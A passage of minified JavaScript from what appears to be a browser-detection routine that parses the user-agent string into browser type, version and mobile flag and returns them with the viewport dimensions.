m=o[0].toLowerCase(),l=o[1];"trident"==o[0].toLowerCase()&&(m="msie",l=t.match(/(rv)\:?(\.?\d+(\.\d+)*)/i),f=l[0].split(":"),l=l[1])}this.mobile=r,this.browserType=m,this.browserVersion=parseInt(l),this.browserVersionExtended=l;if(r==null||r==undefined){r="nm"}if(l==null||l==undefined){l=0}return{0:parseInt(l),1:m,2:l,3:r,4:".",5:Math.max(document.documentElement.clientWidth,window.innerWidth||0),6:Math.max(document.documentElement.clientHeight,window.innerHeight||0)}}});